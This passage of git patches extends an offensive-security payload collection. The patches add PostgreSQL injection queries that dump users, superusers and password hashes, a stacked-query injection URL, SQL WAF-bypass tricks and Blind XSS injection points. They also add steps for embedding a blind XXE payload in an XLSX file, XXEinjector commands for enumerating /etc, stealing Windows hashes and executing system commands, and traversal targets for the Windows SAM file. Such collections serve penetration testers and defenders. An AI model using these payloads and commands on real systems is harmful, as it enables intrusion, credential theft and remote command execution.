PostgreSQL List Database + +```sql +SELECT datname FROM pg_database +``` + +## PostgreSQL List Tables + +```sql +SELECT table_name FROM information_schema.tables +``` + +## PostgreSQL List Columns + +```sql +SELECT column_name FROM information_schema.columns WHERE table_name='data_table' +``` + ## PostgreSQL Error Based ```sql @@ -48,6 +116,14 @@ AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ``` +## PostgreSQL Stacked Query + +Use a semi-colon ";" to add another query + +```sql +http://host/vuln.php?id=injection';create table NotSoSecure (data varchar(200));-- +``` + ## PostgreSQL File Read ```sql From ab341cff384ffc2f218a54bf08b67f1beb850f36 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Mon, 28 Oct 2019 16:51:36 +0530 Subject: [PATCH 10/15] Updated Blind XSS endpoint * User Agent * Comment Box --- XSS Injection/README.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index a0ccd8a..f8cac69 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -416,6 +416,12 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu - Referer Header - Custom Site Analytics - Administrative Panel logs +- User Agent + - Custom Site Analytics + - Administrative Panel logs +- Comment Box + - Administrative Panel + ## Polyglot XSS From 135af74acda9b37a3febf14950dd0de91d923d9d Mon Sep 17 00:00:00 2001 From: duongdpt Date: Mon, 28 Oct 2019 22:26:28 +0700 Subject: [PATCH 11/15] Update README.md Add bypass waf using BETWEEN --- SQL Injection/README.md | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/SQL Injection/README.md b/SQL Injection/README.md index 8099f6d..8d5162b 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -440,12 +440,13 @@ SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1). SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d ``` -No Equal - bypass using LIKE/NOT IN/IN +No Equal - bypass using LIKE/NOT IN/IN/BETWEEN ```sql ?id=1 and substring(version(),1,1)like(5) ?id=1 and substring(version(),1,1)not in(4,3) ?id=1 and substring(version(),1,1)in(4,3) +?id=1 and substring(version(),1,1) between 3 and 4 ``` Blacklist using keywords - bypass using uppercase/lowercase @@ -461,7 +462,7 @@ Blacklist using keywords case insensitive - bypass using an equivalent operator ```sql AND -> && OR -> || -= -> LIKE,REGEXP, not < and not > += -> LIKE,REGEXP, BETWEEN, not < and not > > X -> not between 0 and X WHERE -> HAVING ``` From 5094ef8b108056199f3d84af782803e9ac4feeff Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 28 Oct 2019 20:46:19 +0100 Subject: [PATCH 12/15] XXE in XLSX --- XXE Injection/README.md | 52 +++++++++++++++++++++++++++++++++++++++++ 1 file changed, 52 insertions(+) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index 5801717..b11ebd9 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -30,6 +30,7 @@ Syntax: `` - [XXE inside SVG](#xxe-inside-svg) - [XXE inside SOAP](#xxe-inside-soap) - [XXE inside DOCX file](#xxe-inside-docx-file) + - [XXE inside XLSX file](#xxe-inside-xlsx-file) ## Tools @@ -382,6 +383,56 @@ JPG (experimental) GIF (experimental) ``` +### XXE inside XLSX file + +Extract the excel file. + +```powershell +$ mkdir XXE && cd XXE +$ unzip ../XXE.xlsx +Archive: ../XXE.xlsx + inflating: xl/drawings/drawing1.xml + inflating: xl/worksheets/sheet1.xml + inflating: xl/worksheets/_rels/sheet1.xml.rels + inflating: xl/sharedStrings.xml + inflating: xl/styles.xml + inflating: xl/workbook.xml + inflating: xl/_rels/workbook.xml.rels + inflating: _rels/.rels + inflating: [Content_Types].xml +``` + +Add your blind XXE payload inside `xl/workbook.xml`. + +```powershell + + ]> +&xxe; + +``` + +Rebuild the Excel file. + +```powershell +$ zip -r ../poc.xslx * +updating: [Content_Types].xml (deflated 71%) +updating: _rels/ (stored 0%) +updating: _rels/.rels (deflated 60%) +updating: docProps/ (stored 0%) +updating: docProps/app.xml (deflated 51%) +updating: docProps/core.xml (deflated 50%) +updating: xl/ (stored 0%) +updating: xl/workbook.xml (deflated 56%) +updating: xl/worksheets/ (stored 0%) +updating: xl/worksheets/sheet1.xml (deflated 53%) +updating: xl/styles.xml (deflated 60%) +updating: xl/theme/ (stored 0%) +updating: xl/theme/theme1.xml (deflated 80%) +updating: xl/_rels/ (stored 0%) +updating: xl/_rels/workbook.xml.rels (deflated 66%) +updating: xl/sharedStrings.xml (deflated 17%) +``` + ## References @@ -403,3 +454,4 @@ GIF (experimental) * [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) * [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe) - [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) +- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/) \ No newline at end of file From 52119907f6c6dfac5c1662da865d602fbc14ae5b Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Tue, 29 Oct 2019 00:41:04 +0100 Subject: [PATCH 13/15] add XXEinjector --- XXE Injection/README.md | 28 ++++++++++++++++++++++++++-- 1 file changed, 26 insertions(+), 2 deletions(-) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index b11ebd9..d4792dd 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -42,7 +42,31 @@ Syntax: `` ``` $ python3 230.py 2121 ``` - + - [XXEinjector](https://github.com/enjoiz/XXEinjector) + ```bash + # Enumerating /etc directory in HTTPS application: + ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl + # Enumerating /etc directory using gopher for OOB method: + ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher + # Second order exploitation: + ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt + # Bruteforcing files using HTTP out of band method and netdoc protocol: + ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc + # Enumerating using direct exploitation: + ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK + # Enumerating unfiltered ports: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all + # Stealing Windows hashes: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes + # Uploading files using Java jar: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf + # Executing system commands using PHP expect: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls + # Testing for XSLT injection: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt + # Log requests only: + ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt + ``` ## Detect the vulnerability @@ -454,4 +478,4 @@ updating: xl/sharedStrings.xml (deflated 17%) * [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) * [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe) - [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) -- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/) \ No newline at end of file +- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/) From bb2c2471604761976445d54de2b4a936b034c1df Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 10:32:39 +0530 Subject: [PATCH 14/15] Added List Database Administrator Accounts SELECT datname FROM pg_database --- SQL Injection/PostgreSQL Injection.md | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index d923c5a..2bf952c 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -7,6 +7,7 @@ * [PostgreSQL Current User](#postgresql-current-user) * [PostgreSQL List Users](#postgresql-list-users) * [PostgreSQL List Password Hashes](#postgresql-list-password-hashes) +* [PostgreSQL List Database Administrator Accounts](#postgresql-list-database-administrator-accounts) * [PostgreSQL List Privileges](#postgresql-list-privileges) * [PostgreSQL database name](#postgresql-database-name) * [PostgreSQL List databases](#postgresql-list-database) @@ -57,7 +58,10 @@ SELECT usename FROM pg_user ```sql SELECT usename, passwd FROM pg_shadow ``` - +## PostgreSQL List Database Administrator Accounts +```sql +SELECT usename FROM pg_user WHERE usesuper IS TRUE +``` ## PostgreSQL List Privileges ```sql From bb7e6b7cd0587903fc3040b3699f517fae02b2b0 Mon Sep 17 00:00:00 2001 From: Hi15358 Date: Tue, 29 Oct 2019 16:23:39 +0800 Subject: [PATCH 15/15] Update README.md --- Directory Traversal/README.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md index 1420178..afa72bd 100644 --- a/Directory Traversal/README.md +++ b/Directory Traversal/README.md @@ -144,6 +144,8 @@ c:/unattend.txt c:/unattend.xml c:/unattended.txt c:/unattended.xml +c:/windows/repair/sam +c:/windows/repair/system ``` The following log files are controllable and can be included with an evil payload to achieve a command execution @@ -164,4 +166,4 @@ The following log files are controllable and can be included with an evil payloa ## References * [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack) -* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html) \ No newline at end of file +* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html)